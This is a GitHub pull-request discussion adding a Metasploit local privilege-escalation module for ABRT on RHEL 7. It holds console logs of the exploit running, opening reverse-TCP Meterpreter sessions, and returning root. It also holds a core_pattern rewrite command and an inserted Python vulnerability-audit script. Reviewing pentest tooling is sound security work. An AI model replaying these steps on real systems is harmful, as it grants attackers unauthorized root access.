
Add ABRT sosreport Privilege Escalation module #11762

Merged
merged 4 commits into from Sep 24, 2019

Conversation

@bcoles (Contributor) commented Apr 20, 2019

Lazy wrapper for rebel's sosreport-rhel7.py exploit.

Red Hat Enterprise Linux 7.0 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-12.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.DcxBT2w' (2756 bytes) ...
[*] Writing '/tmp/.HUAWYz' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.151
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.151:50843) at 2019-04-20 07:21:24 -0400
[+] Deleted /tmp/.DcxBT2w
[+] Deleted /tmp/.HUAWYz
[+] Deleted /tmp/hax.sh
[*] waiting for sosreport to finish (can take several minutes)....................

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-123.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 

Red Hat Enterprise Linux 7.1 (x64)

msf5 > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.gFrwiGr' (2756 bytes) ...
[*] Writing '/tmp/.NA4fwK' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 172.16.191.218
[*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.218:51022) at 2019-04-20 07:23:24 -0400
[*] waiting for sosreport to finish (can take several minutes)..............

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
bcoles added 3 commits Apr 20, 2019
@wchen-r7 (Contributor) commented May 24, 2019

I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

@bcoles (Contributor, Author) commented May 24, 2019

> I'm looking for Redhat 7.1 but it seems their website only provides 7.2 at the minimum... could you please find me a link for 7.1?

You'll need to sign up as a Red Hat developer, auth to SSO, and then navigate to the correct portal. This can be achieved in 47 simple steps.

No rush. I'll need to address the above issue before this lands.

@bcoles bcoles added the delayed label May 24, 2019
@wchen-r7 (Contributor) commented May 24, 2019

47 steps!? Wow it's almost like they don't want you to get it.

@bcoles (Contributor, Author) commented May 24, 2019

> 47 steps!? Wow it's almost like they don't want you to get it.

  1. Go here: https://access.redhat.com/downloads/content/69/
  2. Login
  3. Select 7.1 from the drop down
  4. Select RHEL 7.1 Binary DVD

Edit: [not shown above: the 43 steps required to register and find that link]

@wchen-r7 (Contributor) commented May 24, 2019

Thank you.

@bcoles bcoles removed the delayed label May 29, 2019
@bwatters-r7 (Contributor) commented Jun 3, 2019

FWIW, the changes work as expected, though this is not vulnerable:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.135.168:4567 
[*] Sending stage (3021284 bytes) to 192.168.134.103
[*] Meterpreter session 1 opened (192.168.135.168:4567 -> 192.168.134.103:57530) at 2019-06-03 16:26:14 -0500

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.6.1810 (Linux 3.10.0-957.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[*] ABRT package version 2.1.11-52.el7.centos is not vulnerable
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable. Set ForceExploit to override.
[*] Exploit completed, but no session was created.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > 

I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

@bcoles (Contributor, Author) commented Jun 3, 2019

> I'm downloading a CentOS 7.0 iso right now and will try that tomorrow if this is still up.

You'll need RHEL, not CentOS.

@h00die (Contributor) commented Jul 17, 2019

Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
Re-installing my 7.0 server to check it

@bcoles (Contributor, Author) commented Jul 17, 2019

> Is ABRT the default? I have a 7.1 server x64 VM, and at least on it I got "System is not configured to use ABRT for crash reporting"
> Re-installing my 7.0 server to check it

I believe so. That seems like the kind of thing I would have documented if it weren't default.

Both my RHEL 7.0 and RHEL 7.1 had ABRT configured as the crash handler.

I checked the shell history on both test boxes and found no indication that I'd changed the core pattern.

The advisory also indicates that it is the default crash handler:

> A can be used to elevate privileges from an unprivileged user to root
> on a default installation of RHEL 7/7.1. RHEL 6 and lower do not seem
> vulnerable by default.

Changing the core_pattern is easy if you want to check the vulnerability:

echo "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e" > /proc/sys/kernel/core_pattern

But my guess is that your RHEL 7.1 system is likely not vulnerable, as 7.1 was released on 2015-03-05 and the bug was dropped about 6 months later on 2015-11-23. If you've installed updates any time in the last 4 years, it will be patched.
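A host-side audit of the two preconditions discussed above (core dumps piped to abrt-hook-ccpp via core_pattern, and the installed abrt package release), as an added example that is not part of this PR or the Metasploit module. The RPM comparison is a simplified rpmvercmp written for this example; the thread does not state the patched release, so ASSUMED_FIXED_VR is a placeholder set to the lowest release the thread reports as not vulnerable, and the sample core_pattern values are constructed.

```python
import re

# Constructed sample inputs (not taken from the PR): a core_pattern that pipes
# dumps to the ABRT hook, and the plain kernel default.
ABRT_CORE_PATTERN = "|/usr/libexec/abrt-hook-ccpp %s %c %p %u %g %t e"
PLAIN_CORE_PATTERN = "core"
# Assumption: the thread does not state the patched release, so this is a
# placeholder taken from the lowest release the thread reports as not vulnerable.
ASSUMED_FIXED_VR = "2.1.11-52.el7"


def uses_abrt_hook(core_pattern: str) -> bool:
    """True when core dumps are piped to abrt-hook-ccpp (the module's first check)."""
    pattern = core_pattern.strip()
    return pattern.startswith("|") and "abrt-hook-ccpp" in pattern


def _segments(s: str):
    # rpmvercmp-style tokenisation: runs of digits or letters; separators dropped.
    return re.findall(r"\d+|[A-Za-z]+", s)


def _cmp_segments(a: str, b: str) -> int:
    sa, sb = _segments(a), _segments(b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):             # numeric segments compare as integers
                return 1 if int(x) > int(y) else -1
        elif x.isdigit() or y.isdigit():
            return 1 if x.isdigit() else -1  # a numeric segment is newer than alpha
        elif x != y:
            return 1 if x > y else -1
    return (len(sa) > len(sb)) - (len(sa) < len(sb))  # more trailing segments wins


def vr_cmp(a: str, b: str) -> int:
    """Compare 'VERSION-RELEASE' strings as rpm -q --qf '%{VERSION}-%{RELEASE}' prints them."""
    av, _, ar = a.partition("-")
    bv, _, br = b.partition("-")
    return _cmp_segments(av, bv) or _cmp_segments(ar, br)


def assess(core_pattern: str, abrt_vr: str, fixed_vr: str = ASSUMED_FIXED_VR) -> str:
    """Classify a host from its core_pattern and installed abrt version-release."""
    if not uses_abrt_hook(core_pattern):
        return "not using ABRT"
    return "patched" if vr_cmp(abrt_vr, fixed_vr) >= 0 else "vulnerable"
```

On a real host, feed it the contents of /proc/sys/kernel/core_pattern and the output of `rpm -q --qf '%{VERSION}-%{RELEASE}' abrt`.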

@space-r7 space-r7 self-assigned this Sep 24, 2019
@space-r7 (Contributor) commented Sep 24, 2019

Successfully tested against RHEL 7.1:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.163:58254) at 2019-09-24 09:23:15 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/linux/local/abrt_sosreport_priv_esc 
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set verbose true
verbose => true
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > check

[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] The target appears to be vulnerable.
msf5 exploit(linux/local/abrt_sosreport_priv_esc) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] System is configured to use ABRT for crash reporting
[+] abrt-ccpp service is running
[+] ABRT package version 2.1.11-19.el7 is vulnerable
[+] python is installed
[*] Writing '/tmp/.Zw6rGJ2' (2756 bytes) ...
[*] Writing '/tmp/.38QS1nWv' (207 bytes) ...
[*] Launching exploit - This might take a few minutes (Timeout: 600s) ...
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (985320 bytes) to 192.168.37.163
[*] waiting for sosreport to finish (can take several minutes)......................................................................
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.163:58255) at 2019-09-24 09:25:52 -0500
[+] Deleted /tmp/.38QS1nWv
[+] Deleted /tmp/hax.sh

meterpreter > getuid
Server username: uid=0, gid=1000, euid=0, egid=1000
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Red Hat Enterprise Linux 7 (Linux 3.10.0-229.el7.x86_64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
space-r7 added a commit that referenced this pull request Sep 24, 2019
@space-r7 space-r7 merged commit ca8c72d into rapid7:master Sep 24, 2019
3 checks passed:
  1. Metasploit Automation - Sanity Test Execution: Successfully completed all tests.
  2. Metasploit Automation - Test Execution: Successfully completed all tests.
  3. continuous-integration/travis-ci/pr: The Travis CI build passed
msjenkins-r7 added a commit that referenced this pull request Sep 24, 2019
@space-r7 (Contributor) commented Sep 24, 2019

Release Notes

This adds a module that attempts to gain root privileges through a symlink attack by exploiting the Automatic Bug Reporting Tool (ABRT) before v2.7.1.

@bcoles bcoles deleted the bcoles:abrt_sosreport_priv_esc branch Sep 25, 2019